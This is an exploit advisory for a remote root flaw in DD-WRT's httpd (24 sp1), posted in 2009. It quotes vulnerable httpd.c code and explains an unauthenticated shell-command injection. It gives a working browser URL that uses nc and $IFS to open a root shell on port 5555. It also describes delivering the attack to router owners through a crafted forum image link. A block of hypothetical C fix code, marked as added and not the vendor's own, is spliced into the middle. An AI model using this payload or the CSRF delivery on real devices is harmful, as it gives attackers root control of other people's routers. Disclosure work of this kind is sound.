
DD-WRT Remote Root
Posted Jul 21, 2009
Authored by gat3way

The DD-WRT httpd service suffers from a remote code execution vulnerability allowing for root-level compromise.

tags | exploit, remote, root, code execution
SHA-256 | 4fa108e4543009094952548a9199d667cecac3c9c871c59b3e9b52bb465387be

-----------------------------------------------------------------------------------------


A remote root vulnerability in DD-WRT's httpd service. The bug exists in
the latest 24 sp1 version of the firmware.

The problem is due to a combination of bugs and bad software design decisions.
Here is part of httpd.c:

            if (containsstring(file, "cgi-bin")) {

                    auth_fail = 0;
                    if (!do_auth
                        (conn_fp, auth_userid, auth_passwd, auth_realm,
                         authorization, auth_check))
                            auth_fail = 1;


......... (snip)............

                    }
                    exec = fopen("/tmp/exec.tmp", "wb");
                    fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
                    if (query)
                            fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
                                    server_dir != NULL ? server_dir : "/www", file);
                    else
                            fprintf(exec, "/%s/%s\n",
                                    server_dir != NULL ? server_dir : "/www", file);
                    fclose(exec);

                    if (query) {
                            exec = fopen("/tmp/exec.query", "wb");
                            fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacter handling: the request path is written verbatim into a shell script.
2) The command gets executed even without successful authentication.
You are not going to see any output if not authenticated, though.
.......................

                            free(query);
                            fclose(exec);
                    }

                    system2("chmod 700 /tmp/exec.tmp");
                    system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

                    if (auth_fail == 1) {
                            send_authenticate(auth_realm);
                            auth_fail = 0;

------------

3) httpd runs as root :)
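The fixes a reviewer would ask for on issues (1) and (2) above, as an added example that is not DD-WRT's own code: authentication is decided before anything runs, the CGI name is allowlisted, and the program is executed with execv() instead of being written into a shell script. Function names, the 64-character limit and the simplified cgi-bin flow are assumptions; `file` here is only the path component after cgi-bin/, and issue (3) is a deployment matter (run httpd unprivileged) not shown here.

```c
/* Added example (hypothetical names, not DD-WRT's code): the two httpd.c
 * defects described in the advisory, repaired. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

enum cgi_decision { CGI_DENY_AUTH = 401, CGI_DENY_NAME = 400, CGI_RUN = 200 };

/* Fix for issue (1): never hand the request path to a shell. Accept only a
 * plain file name from a tight allowlist, so no ';', '|', '$IFS' or "../"
 * can ever reach an interpreter. The 64-byte limit is an assumption. */
int cgi_name_is_safe(const char *file)
{
    size_t n = strlen(file);
    if (n == 0 || n > 64 || file[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)file[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Fix for issue (2): decide on authentication BEFORE anything executes.
 * `authed` is the caller's do_auth() result. Nothing runs unless both
 * checks pass; a 401 is sent with no side effects at all. */
enum cgi_decision cgi_decide(int authed, const char *file)
{
    if (!authed)
        return CGI_DENY_AUTH;
    if (!cgi_name_is_safe(file))
        return CGI_DENY_NAME;
    return CGI_RUN;
}

/* Reached only after cgi_decide() returned CGI_RUN: run the program directly
 * with execv(), no /bin/sh and no /tmp script, so the path is data, not code.
 * REQUEST_METHOD belongs in the child's environment and the query string on
 * a pipe to its stdin, not in a world-readable /tmp/exec.query file. */
void cgi_run(const char *server_dir, const char *file)
{
    char path[256];
    snprintf(path, sizeof path, "%s/%s", server_dir, file);
    char *const argv[] = { path, NULL };
    execv(path, argv);   /* returns only on failure; caller answers 500 */
}
```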



Now let's sum up (1), (2) and (3). Any unauthenticated attacker who can
connect to the management web interface can easily get root on the device
from a browser with a URL like:

 http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespace breaks it. However, it can easily be
replaced with a shell variable like $IFS. So getting a root shell on 5555/tcp
becomes as easy as typing this in your browser's URL bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is a (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI, which is bad, bad). A basic authentication dialog will appear, though. In
IE even this can be suppressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability
( http://www.securityfocus.com/bid/32703 ), this DOES NOT need an authenticated
session. This means someone can even post a crafted [img] link on a forum,
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)